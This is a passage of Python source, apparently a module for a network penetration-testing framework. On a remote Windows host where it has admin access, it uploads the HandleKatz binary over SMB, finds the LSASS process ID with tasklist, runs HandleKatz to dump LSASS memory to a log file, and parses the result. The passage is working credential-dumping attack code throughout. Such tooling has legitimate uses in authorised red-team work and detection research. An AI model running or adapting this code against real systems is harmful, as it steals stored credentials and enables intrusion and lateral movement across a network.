(self, context, connection)
| 51 | self.dir_result = module_options["DIR_RESULT"] |
| 52 | |
| 53 | def on_admin_login(self, context, connection): |
| 54 | handlekatz_loc = self.handlekatz_path + self.handlekatz |
| 55 | |
| 56 | if self.useembeded: |
| 57 | try: |
| 58 | with open(handlekatz_loc, "wb") as handlekatz: |
| 59 | handlekatz.write(self.handlekatz_embeded) |
| 60 | except FileNotFoundError: |
| 61 | context.log.fail(f"Handlekatz file specified '{handlekatz_loc}' does not exist!") |
| 62 | sys.exit(1) |
| 63 | |
| 64 | context.log.display(f"Copy {self.handlekatz_path + self.handlekatz} to {self.tmp_dir}") |
| 65 | |
| 66 | with open(handlekatz_loc, "rb") as handlekatz: |
| 67 | try: |
| 68 | connection.conn.putFile(self.share, self.tmp_share + self.handlekatz, handlekatz.read) |
| 69 | context.log.success(f"[OPSEC] Created file {self.handlekatz} on the \\\\{self.share}{self.tmp_share}") |
| 70 | except Exception as e: |
| 71 | context.log.fail(f"Error writing file to share {self.share}: {e}") |
| 72 | |
| 73 | # get LSASS PID via `tasklist` |
| 74 | command = 'tasklist /v /fo csv | findstr /i "lsass"' |
| 75 | context.log.display(f"Getting lsass PID via command {command}") |
| 76 | p = connection.execute(command, True) |
| 77 | context.log.debug(f"Command Result: {p}") |
| 78 | if len(p) == 1: |
| 79 | p = p[0] |
| 80 | |
| 81 | if not p or p == "None": |
| 82 | context.log.fail("Failed to execute command to get LSASS PID") |
| 83 | self.delete_handlekatz_binary(connection, context) |
| 84 | return |
| 85 | # we get a CSV string back from `tasklist`, so we grab the PID from it |
| 86 | pid = p.split(",")[1][1:-1] |
| 87 | context.log.debug(f"pid: {pid}") |
| 88 | |
| 89 | command = self.tmp_dir + self.handlekatz + " --pid:" + pid + " --outfile:" + self.tmp_dir + "%COMPUTERNAME%-%PROCESSOR_ARCHITECTURE%-%USERDOMAIN%.log" |
| 90 | context.log.display(f"Executing command {command}") |
| 91 | |
| 92 | p = connection.execute(command, True) |
| 93 | context.log.debug(f"Command result: {p}") |
| 94 | |
| 95 | if "Lsass dump is complete" in p: |
| 96 | context.log.success("Process lsass.exe was successfully dumped") |
| 97 | dump = True |
| 98 | else: |
| 99 | context.log.fail("Process lsass.exe error un dump, try with verbose") |
| 100 | dump = False |
| 101 | |
| 102 | if not dump: |
| 103 | self.delete_handlekatz_binary(connection, context) |
| 104 | return |
| 105 | else: |
| 106 | regex = r"([A-Za-z0-9-]*\.log)" |
| 107 | matches = re.search(regex, str(p), re.MULTILINE) |
| 108 | if not matches: |
| 109 | context.log.display("Error getting the lsass.dmp file name") |
| 110 | return |